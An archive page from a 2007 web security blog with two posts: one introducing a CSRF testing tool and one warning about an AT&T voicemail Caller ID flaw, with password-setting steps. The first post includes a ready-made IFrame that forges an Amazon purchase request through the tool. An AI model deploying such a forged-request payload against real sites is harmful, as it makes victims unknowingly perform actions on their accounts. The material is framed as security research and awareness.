About the Author

Hi, I'm Chris, a web developer and a founding member of Analog. I live and work in Brooklyn, NY.

All Posts for Jul 2007

Skip This Section and Jump to the Main Content

2003
2004
2005
2006
2007
2008
2009
2010

'03:: All; Aug; Sep; Oct; Nov; Dec

'04:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'05:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'06:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'07:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'08:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'09:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'10:: All; Jan; Feb

CSRF Redirector

Wed, 18 Jul 2007 03:49:53 GMT
16 Comments
References
Link

Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is complicated.

To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL&NAME=VALUE, where URL is the (URL-encoded) target site, and NAME and VALUE represent a name-value pair, of which there can be zero or more.

For example, the following IFrame exploits the Amazon vulnerability:

<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />

I may add more features at some point. Until then, enjoy!

iPhone Security Concern

Mon, 02 Jul 2007 03:11:06 GMT
6 Comments
References
Link

Nitesh Dhanjani just posted a reminder of an AT&T/Cingular vulnerability he first mentioned over a year ago. If you've recently purchased an iPhone, here's the scary part:

The AT&T/Cingular voicemail system is configured by default not to ask for a password when you check your voicemail from the handset. Unfortunately, the AT&T/Cingular voicemail system trusts Caller ID to determine if the handset is calling it.

I'm not going to claim that Caller ID spoofing is easy, but Paris Hilton can do it. I'm just saying.

Until this vulnerability is fixed, Nitesh recommends setting your voicemail password:

Call your AT&T/Cingular voicemail (dial your own number from the iPhone).
Press 4 to go to Personal Options.
Press 2 to go to Administrative Options.
Press 1 to go to Password.
Press 2 to turn your password On.

Thanks for the reminder, Nitesh!

Chris Shiflett wrote:: Thanks for the kind words, Simon. I'm glad you liked the tutorial. In case it's helpful, here'...; Posted in Webstock
Chris Shiflett wrote:: Hi Robin, I plan to post something about it, but it's going to be hard to express everything i...; Posted in Webstock
Simon Mahony wrote:: Hi Chris, I really enjoyed your workshop on the Evolution of Security at Webstock. I think I g...; Posted in Webstock
Robin Gorry wrote:: Hi Chris, I was wondering if you were going to post how Webstock went for you this year. I li...; Posted in Webstock
Jess wrote:: I am using the following service for vulnerability research: http://xss-scanner.com; Posted in Adobe PDF XSS Vulnerability